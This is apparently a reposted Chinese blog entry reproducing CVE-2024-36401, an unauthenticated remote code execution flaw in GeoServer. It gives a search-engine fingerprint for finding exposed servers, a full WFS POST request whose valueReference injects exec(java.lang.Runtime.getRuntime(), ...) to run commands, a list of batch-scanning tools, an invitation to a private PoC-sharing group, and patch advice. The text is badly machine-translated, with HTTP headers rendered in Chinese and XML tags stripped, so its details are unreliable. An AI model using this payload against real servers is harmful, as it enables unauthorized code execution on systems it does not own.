【漏洞复现】Geoserver XPath表达式注入致远程代码执行漏洞(geoserver源码解析)

【漏洞复现】Geoserver XPath表达式注入致远程代码执行漏洞0x01 产品简介
GeoServer是一个开源服务器,用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准,使用户能够通过网络访问和

0x01 产品简介

GeoServer 是一个用于共享、处理和编辑地理空间数据的开源服务器。对多种地图和数据标准的支持允许用户通过网络访问和操作地理信息系统(GIS)数据。

0x02 漏洞概述

2024年7月,互联网上披露了一个Geoserver风格的注入远程代码执行漏洞(CVE-2024-36401)。攻击者可以利用此漏洞无需身份验证即可获取服务器权限。我们鼓励受影响的客户尽快修复此漏洞。可能的。

0x03 搜索引擎

应用程序=\’地理服务器\’

0x04 漏洞复现

POST /geoserver/wfs HTTP/1.1

Host:你的IP

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/124.0.6367.118 Safari/537.36

Accept-Encoding: gzip、deflate、br

接受: */*

接受语言: en-US;q=0.9,en;q=0.8

内容类型: 应用程序/xml

关闭连接:

wfs:GetPropertyValue 服务=\’WFS\’ 版本=\’2.0.0\’

xmlns:topp=\’http://www.openplans.org/topp\’

xmlns:fes=\’http://www.opengis.net/fes/2.0\’

xmlns:wfs=\’http://www.opengis.net/wfs/2.0\’

wfs:Query typeNames=\’topp:states\’/

wfs:valueReferenceexec(java.lang.Runtime.getRuntime(),\’执行命令\’)/wfs:valueReference

/wfs:获取属性值

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

使用VX扫描并加入我们内部的POC脚本共享圈。

0x06 修复建议

先前版本的官方补丁已发布可供下载(https://geoserver.org/),其中包含修复的gt-app-schema、gt-complex 和gt-xsd-core jar 文件。可以从GeoServer 版本2.25.1、2.24.3、2.24.2、2.23.2、2.21.5、2.20.7、2.20.4、2.19.2 和2.18.0 的发行页面下载补丁。下载后,使用补丁文件替换原文件。

#【漏洞复现】上述Geoserver XPath表达式注入远程代码执行漏洞相关内容来源于互联网,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93323.html

(0)
CSDN的头像CSDN
上一篇 2024年7月6日
下一篇 2024年7月6日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注